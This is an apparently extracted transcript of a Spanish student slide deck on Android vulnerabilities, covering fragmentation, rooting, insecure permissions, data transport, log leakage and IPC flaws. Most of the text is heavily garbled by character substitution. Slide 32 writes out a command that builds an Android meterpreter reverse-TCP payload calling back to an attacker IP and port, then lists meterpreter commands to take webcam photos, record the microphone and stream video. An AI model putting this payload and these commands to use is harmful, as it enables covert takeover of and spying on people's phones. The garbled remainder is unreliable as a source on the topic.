Android Vulnerabilidades

8/16/2019 Android Vulnerabilidades

1/34

“VULNERABILIDADES EN

ANDROID”ALUMNO: JUAN CARLOS BARRAGÁN BONILLA.


2/34

ECOSISTEMA ANDROID

IDC en Q3 2012 Android en!" e# $%& de# 'er("do ')ndi"# (on 13*'i##one+ de )nid"de+

IDC en Q3 2013 ","r("," e# -1& $1& $0& $/&...


3/34

INICIOS


4/34

GOOGLE . De+"rro##o de# n)(#eo SO.

CARRIERS: roeen de o 4 "((e+o " d

5ABRICANTES 6 De+"rro##o de 7"rd8

OEMS Ori9in"# E)i;'en M"n)n"# e ine9r"n #o+(o';onene+.


5/34

CUSTOM ROMS


6/34

TIOS DE USUARIOS

CONSUMIDORES

ROOTS

INVESTIGADORES DE SEGURIDAD


7/34

5RAGMENTACION

• MULTILESDISOSITI?OS

• CON5IGURAC7ARD@ARE

• NI?ELES DE A•

TAMAOS DEANTALLA• ERI5ERICOS

DISONIBLES


8/34

Un ""("ne ;)ede en(onr"r


9/34

ROBLEMAS EN EL ARAISO 5RAGMENTACION

ACTUALIKACIONES DE SO5T@ARE.

SIN NUMERO DE DISOSITI?OS INSEGUROS.

L"+ ";#i("(ione+ +e ;)eden ;"r(="r ;or e# de+"rro##"dor " r"e+ deSore ;ero )n SO e+ di


10/34

ROBLEMAS EN EL ARAISO

L" #i,er"(in de n!e+$ er+ione+ de "ndroid elento. OEMS ienden " +er de'"+i"do #eno+ ;"r" ";#i(;"r(=e+. B", -ortin. e+ ";#i("r )n" re;"r"(in de +o<

;"r" )n" "()"# o ie" er+in +on ;rin(i;"#'einei+ene+ Goo9#e iende " re;"r"r +o,re #" er+in "t!l+o


11/34

BUGS Cono(ido+ (o'o )#ner",i#id"d de ="#


12/34

SEGURIDAD ?S LIBERTAD

"r" ;reenir "#er"(ione+ "# +o("(ione+ de )+)"rio+ ""n"do+ de$e$t%ili/r el $i$tem 4 d"r #)9"r " #"+ ##de +o;ore inne(e+"ri"+.

M)(=o+ pro+eedore$ ofre"en '"ner"+ ;"r")+)"rio+ >n"#e+ ;"r" de+,#o)e"r #o+ di+;o+iio


13/34

ARQUITECTURA DE ANDROID1. Android ";;#i("

2. Android 5r"'e8

3. D"#i ir)"#'"(=ine

. U+er+;"(e n"(ode.%. Lin) erne#.


14/34

ARQUITECTURA DE ANDROID1. A;#i("(ione+ Android ;er'ien " #o+ de+"rro##"dore+ "';#i"r 4 'eo(iene ;"r" e# +i+e'" o;er"io +),4"(ene. Iner;re


15/34

LIMITES DE SEGURIDAD ERNEL SACE o;er"(ione+ de ,"o nie# de ="rd8"re 4 "((eder "'e'ori" ir)"# 4

USER SACE no ;)ede "((eder " od" #" 'e'ori" de,ido "# #!'ie;or #" CU. ERMISOS +e ,"+"n en e+",#e(er #i'ie+ "# in+"#"r ";

2* Ai$lmiento de pro"e$o$ e+nd"r de Lin)

2. ID de )+)"rio 3ni"o UIDH ;"r" #" '"4or!" de #o+ ;ro(e+o+3. er'i+o+ de# +i+e'" de "r(=io+ ')4 re$trin.ido.


16/34

EJEMLOSGr);o ;er'ie " )n ;ro(e+o de #e()r" 4 e+(ri)r" en e# dire(orio

Android )i#i" 9r);o+ +);#e'en"rio+ ;"r" ;er'iir ;ro(e+o+ ;"r" "((eder#o+ re()r+o+ (o';"rido+ o ;roe9ido+ "#9)no+ (on(eden dere(=o+"di(ion"#e+ " ;ro(e+o+.

9r);o ;er'ie " )n ;ro(e+o #e()r" 4 e+(ri)r" en e# dire(orio“4$d"rd”


17/34

UID: e+ ni(o ;"r" ("d"";#i("(in.


18/34

Co';onene+ re#e"ne+Android

AndroidMnife$t*xml 5 Cd pp de%e de tener !no 6 7de"lr"i8n de npermi$o$6 $er+i"o$6 li%rer9$ extern$:;

T&e Android


19/34

Rooin9 4o)r dei(e: R"one+ ;"r" o,ener )+)"rio (on ;rii#e9io+ roo:

1. A)di"r +e9)rid"d de "ndroid

2. C"',i"r (on>9)r"(ione+ o (o';or"'ieno.

3. T)ne"r

. Borr"r ";#i("(ione+ ;rein+"#"d"+.

%. 7"(er ,"();+ (o';#eo+ 4 re+")r"(ione+.

*. C"r9"r erne#+ ;er+on"#i"do+

“Rooter "ompromete l $e.!ridd del di$po$iti+o“

U+)"rio+ de d"o+ e;)e+o+ " ";#i("(ione+ roo ,oo #o"der #o(+ 4 "()>r'"d"+ ,orr"d"+.


20/34

OBTENER ROOT DO@ANLOADING MODE

ANDROID RECO?ERW

CLOC@ORMODERECO?ERW

ABUSING ABDB ERMISOS ADBD DAEMON

TEMORARW ROOT 6 NAND LOC IERDE CAMBIOS AL REINCIAR

ERMANENT ROOT 6 NAND LOC DES7ABILITAR SEG. 5LAG EN BA5LAS7 CON NAND UNLOC


21/34

ROOT CON NANDX+ UNLOC 1. O,ener roo S=e## +o


22/34

INSEGURIDAD EN ALICACIO 5ALLAS EN ERMISOS DE A:

DESARROLLADORES DAN MAS ERMISOS DE LOS REQUERIDOS.

TRANSMISION INSEGURA DE DATOS SENSIBLES TTL SSLH: CI5RADO DEBIL O AUSENTE AUSENCIA DE ALARMAS DE SEGURIDAD O ERRORES DE ?ALIDACION DE

CERTI5ICADOS USO DE TEVTO LANO DESUES DE 5ALLAS

5UGA DE IN5ORMACION ATRA?ES DE REGISTROS ?ER 7ISTORIAL @EB W ROBAR IDENTI5ICADORES DE SESION LOGCATH.

INSEGURA COMUNICACIYN ENTRE ROCESOS ICH DE5INICION DE IC ACCESIBLE OR OTRAS ALICACIONES:

INJECTION DIRECTORIO TRANS?ERSAL.


23/34

5ALLAS EN ERMISOS DE A D"d" #" 9r"n)#"rid"d de# 'ode#o de ;er'i+o+ de "ndroid ="4 o;or)nid"d

de+"rro##"dore+ de +o#i(i"r '"+ ;er'i+o+ de #o+ )e +) ";; ;)ed" re)eri No +e do()'en"n #o+ ;er'i+o+ ei+ene+ denro de #" Android AI ""i#",Android O;en So)r(e roe( AOSH +"rS("n "ndroid .1 ("## o en",i#id"d o


24/34

TRANSMISION INSEGURA DEDATOS SENSIBLES TTL SSLH CI5RADO DEBIL O AUSENTE

AUSENCIA DE ALARMAS DE SEGURIDAD O ERRORES DE ?ALIDACION DECERTI5ICADOS

USO DE TEVTO LANO DESUES DE 5ALLAS

E# "")e ;)ede re"#i"r+e "r"e+ de '"nin=e'idd#e

Ro,o de Toen en Goo9#e C#ienLo9in ;roo(o#o de ")eni("(in AndroidSo#i(i"r oen e# ()"# ;)ede +er re)+"do ;"r" r"n+"((ione+ +),+e()ene

E# ""("ne ;)ede ;er+oni>("r "# )+)"rio.


25/34

INSEGURO ALMACENAMIENTDE DATOS Android o9)r"(in 4 IM #o9+ . C)"ndo ()"#)ier "r(=io e+ (re"do " r"\+ de (di9o (o'"ndo+ eerno+ e# ;ro(e+o =ered"," e# )'"+ de e;"dre 49oe (on )n" )'"+ de 000

E+o +i9ni>(" ;er'i+o+ 9#o,"#e+ de #e()r" 4 e+(ri)r".


26/34

5UGA DE IN5ORMACIONATRA?ES DE #o9+

Lo+ de+"rro##"dore+ )+"n #o+ re9i+ro+ de #o+ #o9de;)r"r.

A;;+ )e ienen e# ;er'i+o de READZLOGS ;)o,ener "((e+o " e+o+ 'en+"e+ de re9i+ro

or 'edio de LOGCAT So#o de .1 ;"r" "r+.

E+ ;o+i,#e o,+er"r "(iid"d 8e, ro,"rideni>("dore+ de +e+in.

Y


27/34

INSEGURA COMUNICACIYNENTRE ROCESOS ICH L" (o')ni("(in enre ;ro(e+o+ (o')ne+ end ;oin ISeri(e+ A(iiie+Bro"d("+Re(eier+ "nd Conen

oen(i"#e+ e(ore+ de "")e.

C)"ndo )n IC no e+ "+e9)r"do )n" ";; '"#i(io+" e+

+o#i(i" 4 e+ (on(edido.

Se e;one (onenido de d"o+ e+r)()r"do+ 4 e+o ;ro"")e+ de in4e((in o dire(orio r"n+er+"#


28/34

?ULNERABILIDADES TO 201 S"9e


29/34

?ULNERABILIDADES TO 201 C?E 201*0$2-

E# &",er ;"+" " +er dmini$trdor 4 ;)ede ree+((di9o+ ,+i(o+ )e 9"r"ni"n )n" ee()(in nor'""re"+ ,+i("+.

e+e " )e " +i';#e i+" ;"re(" )n e#e'eno 9r"e 42 de ("d" 3 +o;ore+ (on Android ;)ed"n er+e e;)n'ero de "")e+ no =" +ido e#e"do.


30/34

?ULNERABILIDADES TO 201 Medi"e

Se r"" de )n r'".

)ede "


31/34

C?E 201*0-01 E+" )#ner",i#id"d )e =" +ido +o#)(ion"d" (on r";ide ;or Goo9#e

Se ,"+" en #" in


32/34

Tro(ni/ndo Android

+sudo sfpa%load android,eterpreter,reversetcpLO"/0123.145.1..131 L&O6/07777 6 8 ,root,Des'top,)i#.

Vie' r!nnin. pro"e$$e$ @@ meterpreter p$

Ser"& for )le @@ meterpreter $er"& 5f *mp

T,e p&oto$ !$in. t&e de+i"e$ "mer$ @@ meterpreter 'e

@@ meterpreter 'e%"m$np 5I Re"ord $o!nd 'it& t&e mi"rop&one @@ meterpreter re"ord

Vie'in. +ideo $trem from t&e de+i"e$ "mer @@ meterpr'e%"m$trem 5I

t&i$


33/34

t&i$

1. On#4 in+"## ";;+ "nd +o


34/34

OBSER?ACION: L" (i"# "endr+ )e o'"r 'edid"+ ;"r" +o#)(ion"r#o.

A#9)n"+ de e##"+ ;"+"n ;or ,)+("r )n" "#ern"i" (o'o C%anogen(on+e9)ir "()"#i"r e# di+;o+iio 'i# " ;e+"r de )e no ei+" )di+ri,)(in o>(i"# de#

Android Vulnerabilidades

Documents

Transcript of Android Vulnerabilidades